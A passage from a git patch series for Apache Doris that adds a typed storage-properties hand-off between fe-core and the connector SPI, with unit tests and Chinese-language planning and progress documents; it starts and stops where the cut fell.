`FileSystemPluginManager` 或 fe-filesystem-spi)。**白名单假设被推翻** → 需用户定向 + 最小扩张(DV-001 三选项,已 AskUserQuestion)。 - **✅ 定向(用户 2026-06-17)**:选机制 **A**(DV-001 → D-009)——bind-all 落 fe-core `FileSystemPluginManager.bindAll`,`getStorageProperties()` 经 `getOrigProps()` 取 raw map、不碰构造点。白名单 +`FileSystemPluginManager.java`(仅新增)。P0-T01 闭环;进入 P0-T02。 -### P0-T02 ⬜ fe-core FileSystemPluginManager 新增 bindAll(raw map → List) +### P0-T02 ✅ fe-core FileSystemPluginManager 新增 bindAll(raw map → List)(2026-06-17,TDD 5 绿 + checkstyle 0) - **做什么**(D-009):在 fe-core `FileSystemPluginManager` 加 additive `public List bindAll(Map)`:遍历已注册 providers,对 `supports(props)` 命中者调 `provider.bind(props)` **全量收集**(非首个命中),返回 `List`(`FileSystemProperties extends StorageProperties`,故 bind 产物 IS-A 目标类型)。**仅新增方法,不动 `createFileSystem` 等既有方法。** - **验收**:单测:给定 S3/OSS/HDFS 等代表性 raw props,`bindAll` 返回非空、类型正确、覆盖期望后端的列表(与 fe-core 旧 `StorageProperties.createAll` 选中的后端集合对齐);空/无匹配返回空列表不抛。`createFileSystem` 行为零回归。fe-core 旧 `datasource.property.storage` 包 + fe-filesystem 模块零改动。 +- **完成态**:`FileSystemPluginManagerTest` 加 4 个 bindAll 测试(collect-supporting / skip-non-supporting / skip-legacy-no-bind / empty),全绿(5/5,含原 registerProvider 测);`FileSystemPluginManager.java` +34 行纯新增(import + bindAll + javadoc,未动既有方法);checkstyle 0。**实证修订**:真对象存储 providers 是运行时目录插件(不在 fe-core 单测 classpath,pom 注「Phase 4 P4.1 移除 impl 运行时依赖」)→ 删除原打算的 real-S3 集成测试(移交 P1-T06 docker 全插件 classpath);bindAll 用 fake providers 钉契约。测试文件 `fs/FileSystemPluginManagerTest.java` 为白名单 bindAll 的伴随测试(合理在范围内)。 - **依赖**:无(∥ P1-T01)。设计 §4 P0-2 / §2.1 / **D-009 / DV-001**。**红线**:仅改 `FileSystemPluginManager.java`(新增 bindAll)。 --- @@ -35,6 +36,7 @@ - **做什么**(D-009):fe-core `DefaultConnectorContext` override `getStorageProperties()`:从现有 `storagePropertiesSupplier.get()` 取任一 fe-core typed 值的 `getOrigProps()`(= 完整 catalog raw map),喂 `FileSystemPluginManager.bindAll(rawMap)`(P0-T02)返回 fe-filesystem `List`。supplier 空(REST/vended、非 plugin ctor)→ 返回空列表(无静态 storage,正确)。**不改构造点。** - **验收**:paimon catalog 下 `ctx.getStorageProperties()` 返回正确 typed 列表;hive/iceberg/其它连接器行为不变(默认空)。需确认 fe-core `createAll` 各实例 `origProps` = 完整 raw map(实现时读 `createAll`+ctor 核实)。 - **依赖**:P1-T01, P0-T02。设计 §4 P1-2 / **D-009**。**红线**:fe-core 仅此文件新增 `getStorageProperties()`(bindAll 在 P0-T02 的 FileSystemPluginManager)。 +- **⚠️ 待解(P0-T02 发现,2026-06-17)**:生产中对象存储 providers 是 `Env.loadPlugins(pluginRoot)` **目录插件**(非 fe-core classpath built-in;fe-core pom 注「Phase 4 P4.1 移除 impl 运行时依赖」)。故 `getStorageProperties()` **必须**用那个**已加载插件的 live** `FileSystemPluginManager`(fresh `new+loadBuiltins` 无对象存储 provider→bindAll 空→paimon storage 失效)。但 live 实例存于 `FileSystemFactory.pluginManager`(private static、**无 getter**)。→ P1-T02 需在 `FileSystemFactory` 加 static accessor(如 `getPluginManager()` 或 `bindAllStorageProperties(map)` 委托),**即第 3 个 fe-core 文件**(白名单需再 +1)。实现 P1-T02 前 AskUserQuestion 确认。 ### P1-T03 ⬜ PaimonCatalogFactory.applyStorageConfig 改走 toHadoopConfigurationMap - **做什么**:把 `fe-property StorageProperties.buildObjectStorageHadoopConfig(props)` 换成"遍历 `ctx.getStorageProperties()` 调 `toHadoopProperties().toHadoopConfigurationMap()`";**保留**其后的 `paimon.*/fs./dfs./hadoop.` 覆盖块(保序 last-write-wins)。 From ffd54669ee5c0aeb7cb84aa9ba572ffa39146e7c Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 17 Jun 2026 13:52:19 +0800 Subject: [PATCH 077/128] [P1-T01] fe-connector-spi: ConnectorContext.getStorageProperties() + fe-filesystem-api edge Adds the storage seam (design D-003): a default `List getStorageProperties()` returning an empty list, typed on the fe-filesystem-api `StorageProperties` interface, plus the `fe-connector-spi -> fe-filesystem-api` pom dependency. This is the load-bearing "fe-connector depends ONLY on fe-filesystem-api" edge: a connector can derive its Hadoop config (toHadoopProperties(). toHadoopConfigurationMap()) and BE creds (toBackendProperties().toMap()) without importing fe-core or any provider impl. Default empty -> every other connector is unaffected. fe-filesystem-api is a clean leaf (no fe-core/common/datasource transitive deps), so the connector-imports gate stays green. TDD: new ConnectorContextTest (first test in fe-connector-spi) pins "defaults to a non-null empty list"; RED (assertNotNull on a null stub) -> GREEN (1/1). checkstyle 0; tools/check-connector-imports.sh PASS. ConnectorContext.java +25 lines, purely additive. Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-spi/pom.xml | 8 +++ .../doris/connector/spi/ConnectorContext.java | 25 +++++++++ .../connector/spi/ConnectorContextTest.java | 54 +++++++++++++++++++ .../metastore-storage-refactor/HANDOFF.md | 7 ++- .../metastore-storage-refactor/PROGRESS.md | 11 ++-- plan-doc/metastore-storage-refactor/tasks.md | 3 +- 6 files changed, 98 insertions(+), 10 deletions(-) create mode 100644 fe/fe-connector/fe-connector-spi/src/test/java/org/apache/doris/connector/spi/ConnectorContextTest.java diff --git a/fe/fe-connector/fe-connector-spi/pom.xml b/fe/fe-connector/fe-connector-spi/pom.xml index 670687d6a42728..1c9564ce23f6db 100644 --- a/fe/fe-connector/fe-connector-spi/pom.xml +++ b/fe/fe-connector/fe-connector-spi/pom.xml @@ -50,6 +50,14 @@ under the License. fe-extension-spi ${project.version} + + + ${project.groupId} + fe-filesystem-api + ${project.version} + org.junit.jupiter junit-jupiter diff --git a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java index 6a7fb7965ab69c..3bc8aa3ced27a1 100644 --- a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java +++ b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java @@ -18,8 +18,10 @@ package org.apache.doris.connector.spi; import org.apache.doris.connector.api.ConnectorHttpSecurityHook; +import org.apache.doris.filesystem.properties.StorageProperties; import java.util.Collections; +import java.util.List; import java.util.Map; import java.util.concurrent.Callable; @@ -205,4 +207,27 @@ default String normalizeStorageUri(String rawUri, Map rawVendedC default Map getBackendStorageProperties() { return Collections.emptyMap(); } + + /** + * Returns the catalog's static storage configuration as a list of typed, already-bound + * {@link StorageProperties} (the fe-filesystem API contract). fe-core binds the catalog's raw + * properties against the registered filesystem providers and hands the result down here, so a + * connector can derive both its Hadoop/{@code HiveConf} config + * ({@code toHadoopProperties().toHadoopConfigurationMap()}) and its BE-facing credentials + * ({@code toBackendProperties().toMap()}) without importing fe-core or any storage provider — + * it sees only the {@code fe-filesystem-api} interface. + * + *

      One entry per configured backend (e.g. an object store, plus HDFS when present), mirroring + * the engine's parsed storage list. Legacy backends that have no typed model (HDFS/broker/local) + * are absent; the connector handles those via its own raw {@code fs.}/{@code dfs.}/{@code hadoop.} + * passthrough. + * + *

      The default returns an empty list (no storage machinery), so every other connector — and any + * credential-less warehouse — is unaffected. + * + * @return the catalog's typed storage properties, or an empty list when none + */ + default List getStorageProperties() { + return Collections.emptyList(); + } } diff --git a/fe/fe-connector/fe-connector-spi/src/test/java/org/apache/doris/connector/spi/ConnectorContextTest.java b/fe/fe-connector/fe-connector-spi/src/test/java/org/apache/doris/connector/spi/ConnectorContextTest.java new file mode 100644 index 00000000000000..8bea353cb8a173 --- /dev/null +++ b/fe/fe-connector/fe-connector-spi/src/test/java/org/apache/doris/connector/spi/ConnectorContextTest.java @@ -0,0 +1,54 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.spi; + +import org.apache.doris.filesystem.properties.StorageProperties; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.List; + +public class ConnectorContextTest { + + /** A minimal ConnectorContext implementing only the two abstract methods; everything else default. */ + private static ConnectorContext minimalContext() { + return new ConnectorContext() { + @Override + public String getCatalogName() { + return "test_catalog"; + } + + @Override + public long getCatalogId() { + return 1L; + } + }; + } + + @Test + public void getStorageProperties_defaultsToEmptyList() { + // The new storage seam (D-003): fe-core overrides this to hand the connector the catalog's + // typed fe-filesystem StorageProperties. Every OTHER connector keeps the default empty list, + // so introducing the seam must not change their behavior -- and it must never return null. + List storage = minimalContext().getStorageProperties(); + Assertions.assertNotNull(storage, "getStorageProperties() must never return null"); + Assertions.assertTrue(storage.isEmpty(), + "default getStorageProperties() must be empty so non-paimon connectors are unaffected"); + } +} diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 09be6adccae6f4..7cc59ff7cc63b1 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -18,10 +18,9 @@ - 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧 进行中**。 - **范围已获批(2026-06-17 用户确认)= P0 + P1(storage 收口),做到 P1-T06 gate 停**。 - **P0-T01 ✅**(recon + 定向)→ **DV-001 / D-009**:缺 bind-all 入口,定机制 A(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +`FileSystemPluginManager.java`)。 -- **P0-T02 ✅**(`FileSystemPluginManager.bindAll`,TDD 5 绿 + checkstyle 0,纯新增 34 行)。 -- **下一个:P1-T01**(`ConnectorContext.getStorageProperties()` 默认方法 + pom 边)。 -- ⚠️ **P1-T02 待解**:须经 `FileSystemFactory` static accessor 取 **live**(loadPlugins 过的)manager(fresh+loadBuiltins 无对象存储 provider)→ 第 3 个 fe-core 文件,P1-T02 前 AskUserQuestion。 -- 代码 commit:P0-T01(plan-doc)+ P0-T02(bindAll)。 +- **P0-T02 ✅**(`FileSystemPluginManager.bindAll`,TDD 5 绿)| **P1-T01 ✅**(`ConnectorContext.getStorageProperties()` 默认空 + fe-connector-spi→fe-filesystem-api 边,TDD 1 绿 + import-gate PASS)。 +- **下一个:P1-T02**(`DefaultConnectorContext.getStorageProperties()` 实现)——**⛔ 先 AskUserQuestion**:须经 `FileSystemFactory` static accessor 取 **live**(loadPlugins 过的)manager(fresh+loadBuiltins 无对象存储 provider)→ 第 3 个 fe-core 文件、白名单再 +1。 +- 代码 commit:P0-T01(plan-doc)+ P0-T02(bindAll)+ P1-T01(getStorageProperties 默认方法)。 ## 下一步(明确) 1. **等待用户批准 `tasks.md`(14 task,含 P3a)** 后进入 Implement。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index 772391f3ac6473..ae45a13f7872c6 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -10,16 +10,16 @@ |---|---|---| | Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | -| **Implement(实现)** | ██░░░░░░░░ ~14% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅ 完成) | +| **Implement(实现)** | ███░░░░░░░ ~21% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 1/6) | -任务计数:**2 / 14** 完成(P0: 2/2 ✅ | P1: 0/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 +任务计数:**3 / 14** 完成(P0: 2/2 ✅ | P1: 1/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 --- ## 当前活跃 task -- **下一个:`P1-T01`**(`ConnectorContext.getStorageProperties()` 默认方法 + `fe-connector-spi→fe-filesystem-api` 边)。 -- P0-T01 ✅(recon + 定向 DV-001/D-009)| P0-T02 ✅(`FileSystemPluginManager.bindAll`,TDD 5 绿 + checkstyle 0)。 -- ⚠️ **P1-T02 待解**:getStorageProperties 须用 **live**(已 loadPlugins 的)FileSystemPluginManager;该实例存于 `FileSystemFactory.pluginManager`(private、无 getter)→ 需在 `FileSystemFactory` 加 static accessor = **第 3 个 fe-core 文件**(白名单再 +1),P1-T02 前 AskUserQuestion。 +- **下一个:`P1-T02`**(`DefaultConnectorContext.getStorageProperties()` 实现)——**⛔ 先 AskUserQuestion**(见下 P1-T02 待解)。 +- P0-T01 ✅(recon + DV-001/D-009)| P0-T02 ✅(`FileSystemPluginManager.bindAll`)| P1-T01 ✅(`ConnectorContext.getStorageProperties()` 默认方法 + fe-connector-spi→fe-filesystem-api 边)。 +- ⚠️ **P1-T02 待解(gating)**:getStorageProperties 须用 **live**(已 loadPlugins 的)FileSystemPluginManager;该实例存于 `FileSystemFactory.pluginManager`(private、无 getter)→ 需在 `FileSystemFactory` 加 static accessor = **第 3 个 fe-core 文件**(白名单再 +1)。P1-T02 前 AskUserQuestion 确认。 ## 阻塞 / 待决 - ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 @@ -29,6 +29,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-17 **P1-T01 ✅**(`ConnectorContext.getStorageProperties()` 默认空列表 + `fe-connector-spi→fe-filesystem-api` pom 边):TDD(RED assertNotNull→GREEN 1/1)+ checkstyle 0 + import-gate PASS;新建首个 fe-connector-spi 测试。 - 2026-06-17 **P0-T02 ✅**(`FileSystemPluginManager.bindAll`,D-009):TDD(RED 5 错→GREEN 5 绿)+ checkstyle 0;纯新增 34 行不动既有方法。实证发现真对象存储 providers 是运行时目录插件(非 fe-core 单测 classpath)→ 删 real-S3 集成测试移交 P1-T06;并发现 P1-T02 须经 `FileSystemFactory` static accessor 取 live manager(第 3 fe-core 文件,待 AskUserQuestion)。 - 2026-06-17 **进入 Implement(范围 P0+P1 获批)**;**P0-T01 ✅**(4-agent recon 取证三套 StorageProperties + 连接器 seam):(1) F1 等价性=非阻塞(fe-filesystem 与 paimon 现 fe-property 路常见静态凭据键全等、为超集);(2) F2 可行性=阻塞(无 bind-all 入口,证伪白名单「唯一 fe-core 改动」)→ **DV-001**;用户定 **机制 A** → **D-009**(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +1)。已回写设计/WORKFLOW/decisions/risks/tasks。 - 2026-06-17 **3 设计点定稿(D-006/7/8)**(3-agent recon + 直读复核):**D-006** MetaStore 后端用 `MetaStoreProvider.supports()` 自识别 + ServiceLoader(镜像 `FileSystemProvider`),api 层**去掉** `MetaStoreType` 枚举;**D-007** Kerberos 抽**顶层中立叶子 `fe-kerberos`**(否决 fe-connector-auth:破 fe-filesystem↛fe-connector gate + fe-common 层级倒挂),分 P3a(paimon-local)/P3b(全量去重 follow-up);**D-008** vended 边界=连接器只抽取、fe-core 单点归一(现状已符合)。设计文档 §0/§2.3/§3.1/§3.2/§3.3/§3.5/依赖图已更新。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 3d592efe65cfb2..22386fd25511fc 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -27,10 +27,11 @@ ## P1 — paimon storage 收口到 fe-filesystem-api(纯新增/迁移) -### P1-T01 ⬜ ConnectorContext 新增 getStorageProperties() +### P1-T01 ✅ ConnectorContext 新增 getStorageProperties()(2026-06-17,TDD 1 绿 + checkstyle 0 + import-gate PASS) - **做什么**:`fe-connector-spi` 的 `ConnectorContext` 加 `default List getStorageProperties() { return List.of(); }`(fe-filesystem-api 类型)。pom 增 `fe-connector-spi → fe-filesystem-api`。 - **验收**:编译通过;**这条边即"fe-connector 依赖 fe-filesystem-api"落地**;其它连接器零影响(默认空)。 - **依赖**:无。设计 §4 P1-1 / §3.2。**红线**:仅改 `ConnectorContext.java` + `fe-connector-spi/pom.xml`。 +- **完成态**:`ConnectorContext` 加 `default List getStorageProperties() { return Collections.emptyList(); }`(fe-filesystem-api 类型,+25 行纯新增);pom 加 `fe-filesystem-api` 依赖(=「fe-connector 仅依赖 fe-filesystem-api」边落地)。新建首个测试 `ConnectorContextTest`(默认非空空列表)TDD(RED assertNotNull→GREEN 1/1)。checkstyle 0;`tools/check-connector-imports.sh` PASS(fe-filesystem-api 是纯叶子,无 fe-core/common/datasource 传递依赖)。其它连接器零影响(默认空)。 ### P1-T02 ⬜ DefaultConnectorContext.getStorageProperties() 实现 - **做什么**(D-009):fe-core `DefaultConnectorContext` override `getStorageProperties()`:从现有 `storagePropertiesSupplier.get()` 取任一 fe-core typed 值的 `getOrigProps()`(= 完整 catalog raw map),喂 `FileSystemPluginManager.bindAll(rawMap)`(P0-T02)返回 fe-filesystem `List`。supplier 空(REST/vended、非 plugin ctor)→ 返回空列表(无静态 storage,正确)。**不改构造点。** From 5520975d2e5bce3c13b75edb112bab6a5a111a4f Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 17 Jun 2026 14:07:52 +0800 Subject: [PATCH 078/128] [P1-T02] fe-core: DefaultConnectorContext.getStorageProperties() + FileSystemFactory.bindAllStorageProperties (D-009) Completes the fe-core/spi storage seam (design D-003): fe-core now binds the catalog raw map to typed fe-filesystem StorageProperties and hands them to the connector via ConnectorContext.getStorageProperties(). - FileSystemFactory.bindAllStorageProperties(rawMap): static accessor that reaches the LIVE plugin-loaded FileSystemPluginManager (object-store providers are runtime directory plugins, absent from a fresh manager), or falls back to ServiceLoader when uninitialized -- mirrors getFileSystem's existing dual path. This is the 3rd (and final) additive fe-core file the mechanism needs; the construction site is untouched (R-004). - DefaultConnectorContext.getStorageProperties(): sources the full catalog raw map from the existing storage supplier's getOrigProps() (verified: StorageProperties.createAll passes the whole map to every parsed instance), then binds via the factory. Empty supplier (REST-vended / non-plugin / credential-less) -> empty list, correct parity. Mechanism A, user-confirmed twice (D-009 + its 2026-06-17 "2->3 files" refinement). All 3 fe-core touch points (DefaultConnectorContext, FileSystemPluginManager, FileSystemFactory) are purely additive. TDD: 4 new tests pin the contract -- factory delegate-to-live-manager / ServiceLoader-fallback; ctx empty-supplier / full-binding-captures-the-raw- map (proving getOrigProps extraction). RED (stub UOE / NPE) -> GREEN 4/4. Regression: BackendStoragePropsTest 2/2 + FileSystemPluginManagerTest 5/5 unchanged. checkstyle 0; DefaultConnectorContext +21, FileSystemFactory +32, both additive. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/DefaultConnectorContext.java | 21 +++ .../apache/doris/fs/FileSystemFactory.java | 32 ++++ ...faultConnectorContextStoragePropsTest.java | 148 ++++++++++++++++++ .../fs/FileSystemFactoryBindAllTest.java | 119 ++++++++++++++ .../metastore-storage-refactor/HANDOFF.md | 7 +- .../metastore-storage-refactor/PROGRESS.md | 12 +- .../metastore-storage-refactor/WORKFLOW.md | 1 + .../decisions-log.md | 5 +- plan-doc/metastore-storage-refactor/risks.md | 8 +- plan-doc/metastore-storage-refactor/tasks.md | 13 +- 10 files changed, 347 insertions(+), 19 deletions(-) create mode 100644 fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextStoragePropsTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/fs/FileSystemFactoryBindAllTest.java diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java index a9fbb46dc94d81..81b5fcf19cd951 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java @@ -28,6 +28,7 @@ import org.apache.doris.connector.spi.ConnectorMetaInvalidator; import org.apache.doris.datasource.credentials.CredentialUtils; import org.apache.doris.datasource.property.storage.StorageProperties; +import org.apache.doris.fs.FileSystemFactory; import com.google.common.base.Strings; import org.apache.hadoop.hive.conf.HiveConf; @@ -209,6 +210,26 @@ public Map getBackendStorageProperties() { return CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesSupplier.get()); } + @Override + public List getStorageProperties() { + // Hand the connector the catalog's storage bound as typed fe-filesystem StorageProperties + // (design D-003): the connector derives its Hadoop/HiveConf config and BE creds from these + // without importing fe-core or any provider. Source the catalog raw map from the existing + // storage supplier's getOrigProps() (every parsed StorageProperties carries the full catalog + // map -- StorageProperties.createAll passes it through), then bind it via the live + // plugin-loaded FileSystemPluginManager. An empty supplier (non-plugin ctor / REST-vended / + // credential-less warehouse) yields an empty list -- no static storage, correct parity. + Map typed = storagePropertiesSupplier.get(); + if (typed == null || typed.isEmpty()) { + return Collections.emptyList(); + } + Map rawCatalogProps = typed.values().iterator().next().getOrigProps(); + if (rawCatalogProps == null || rawCatalogProps.isEmpty()) { + return Collections.emptyList(); + } + return FileSystemFactory.bindAllStorageProperties(rawCatalogProps); + } + @Override public String normalizeStorageUri(String rawUri) { // No vended token → normalize against the catalog's static storage map (behavior unchanged). diff --git a/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemFactory.java b/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemFactory.java index 955e27f9cf99a2..6800aecdfadddb 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemFactory.java +++ b/fe/fe-core/src/main/java/org/apache/doris/fs/FileSystemFactory.java @@ -105,6 +105,38 @@ public static org.apache.doris.filesystem.FileSystem getFileSystem(MapMirrors {@link #getFileSystem(Map)}'s dual path: when {@link #initPluginManager} has run + * (production), delegates to the live {@link FileSystemPluginManager#bindAll} so the runtime + * directory-loaded object-store providers are visible; otherwise falls back to ServiceLoader + * discovery (unit-test / migration path). Legacy providers without typed binding are skipped + * (see {@link FileSystemPluginManager#bindAll}). Never returns null. + */ + public static List bindAllStorageProperties( + Map properties) { + FileSystemPluginManager mgr = pluginManager; + if (mgr != null) { + return mgr.bindAll(properties); + } + // Fallback: ServiceLoader discovery (unit-test / migration path), mirroring getFileSystem(Map). + List result = new ArrayList<>(); + for (FileSystemProvider provider : getProviders()) { + if (provider.supports(properties)) { + try { + result.add(provider.bind(properties)); + } catch (UnsupportedOperationException e) { + LOG.debug("FileSystemProvider {} has no typed binding; skipping in " + + "bindAllStorageProperties", provider.name()); + } + } + } + return result; + } + /** * SPI entry point accepting legacy {@link StorageProperties}. * Converts via {@link StoragePropertiesConverter} then delegates to diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextStoragePropsTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextStoragePropsTest.java new file mode 100644 index 00000000000000..6f0fa2e30d82bd --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextStoragePropsTest.java @@ -0,0 +1,148 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector; + +import org.apache.doris.common.security.authentication.ExecutionAuthenticator; +import org.apache.doris.datasource.property.storage.StorageProperties; +import org.apache.doris.filesystem.FileSystem; +import org.apache.doris.filesystem.FileSystemType; +import org.apache.doris.filesystem.properties.FileSystemProperties; +import org.apache.doris.filesystem.properties.StorageKind; +import org.apache.doris.filesystem.spi.FileSystemProvider; +import org.apache.doris.fs.FileSystemFactory; +import org.apache.doris.fs.FileSystemPluginManager; + +import org.junit.jupiter.api.AfterEach; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.function.Function; +import java.util.function.Supplier; +import java.util.stream.Collectors; + +/** + * P1-T02: pins that {@link DefaultConnectorContext#getStorageProperties()} hands the connector the + * catalog's storage bound as typed fe-filesystem {@code StorageProperties} (design D-003 / D-009). + * It must (a) source the catalog raw map from the existing storage supplier's + * {@code getOrigProps()}, and (b) bind it through {@link FileSystemFactory#bindAllStorageProperties} + * (the live plugin-loaded manager), without touching the construction site. + */ +public class DefaultConnectorContextStoragePropsTest { + + private static final Supplier NOOP_AUTH = + () -> new ExecutionAuthenticator() {}; + + @AfterEach + public void resetFactory() { + // The wiring test injects a live manager; restore the "no live manager" default for other tests. + FileSystemFactory.initPluginManager(null); + } + + @Test + public void getStorageProperties_emptyWhenNoStorageMap() { + // 2-arg ctor -> empty storage supplier -> empty list (REST/vended/non-plugin/local-FS warehouse), + // so non-paimon paths are unaffected and there is no NPE. MUTATION: null / throw -> red. + Assertions.assertTrue(new DefaultConnectorContext("c", 1L).getStorageProperties().isEmpty()); + } + + @Test + public void getStorageProperties_bindsCatalogRawMapViaLiveManager() throws Exception { + // Build the fe-core typed storage map exactly like a real OSS catalog; each instance's + // origProps is the full catalog raw map (StorageProperties.createAll passes it through). + Map oss = new HashMap<>(); + oss.put("oss.endpoint", "oss-cn-beijing.aliyuncs.com"); + oss.put("oss.access_key", "ak"); + oss.put("oss.secret_key", "sk"); + List all = StorageProperties.createAll(oss); + Map typed = all.stream() + .collect(Collectors.toMap(StorageProperties::getType, Function.identity(), (a, b) -> a)); + + // Inject a live manager whose provider captures the raw map it is asked to bind. + CapturingProvider provider = new CapturingProvider(); + FileSystemPluginManager mgr = new FileSystemPluginManager(); + mgr.registerProvider(provider); + FileSystemFactory.initPluginManager(mgr); + + DefaultConnectorContext ctx = new DefaultConnectorContext("c", 1L, NOOP_AUTH, () -> typed); + List result = ctx.getStorageProperties(); + + // The connector received the typed props bound from the catalog's FULL raw map (getOrigProps()). + // MUTATION: returning the default empty / not reaching the factory / a filtered map -> red. + Assertions.assertEquals(1, result.size()); + Assertions.assertNotNull(provider.capturedRawMap, "getStorageProperties() must bind via the factory"); + Assertions.assertEquals("ak", provider.capturedRawMap.get("oss.access_key"), + "must bind the full catalog raw map sourced from getOrigProps()"); + Assertions.assertEquals("oss-cn-beijing.aliyuncs.com", provider.capturedRawMap.get("oss.endpoint")); + } + + private static final class CapturingProvider implements FileSystemProvider { + private Map capturedRawMap; + + @Override + public boolean supports(Map properties) { + return true; + } + + @Override + public FileSystemProperties bind(Map properties) { + this.capturedRawMap = properties; + return new FakeFsProps(); + } + + @Override + public FileSystem create(Map properties) { + return null; + } + + @Override + public String name() { + return "capturing"; + } + } + + private static final class FakeFsProps implements FileSystemProperties { + @Override + public String providerName() { + return "FAKE"; + } + + @Override + public StorageKind kind() { + return null; + } + + @Override + public FileSystemType type() { + return null; + } + + @Override + public Map rawProperties() { + return Collections.emptyMap(); + } + + @Override + public Map matchedProperties() { + return Collections.emptyMap(); + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/fs/FileSystemFactoryBindAllTest.java b/fe/fe-core/src/test/java/org/apache/doris/fs/FileSystemFactoryBindAllTest.java new file mode 100644 index 00000000000000..82f269c5160bee --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/fs/FileSystemFactoryBindAllTest.java @@ -0,0 +1,119 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.fs; + +import org.apache.doris.filesystem.FileSystem; +import org.apache.doris.filesystem.FileSystemType; +import org.apache.doris.filesystem.properties.FileSystemProperties; +import org.apache.doris.filesystem.properties.StorageKind; +import org.apache.doris.filesystem.properties.StorageProperties; +import org.apache.doris.filesystem.spi.FileSystemProvider; + +import org.junit.jupiter.api.AfterEach; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.HashMap; +import java.util.List; +import java.util.Map; + +public class FileSystemFactoryBindAllTest { + + @AfterEach + public void resetFactoryState() { + // bindAllStorageProperties / initPluginManager mutate static state; restore the default. + FileSystemFactory.clearProviderCache(); + } + + @Test + public void bindAllStorageProperties_delegatesToLivePluginManager() { + // Production path: a plugin-loaded manager is set at 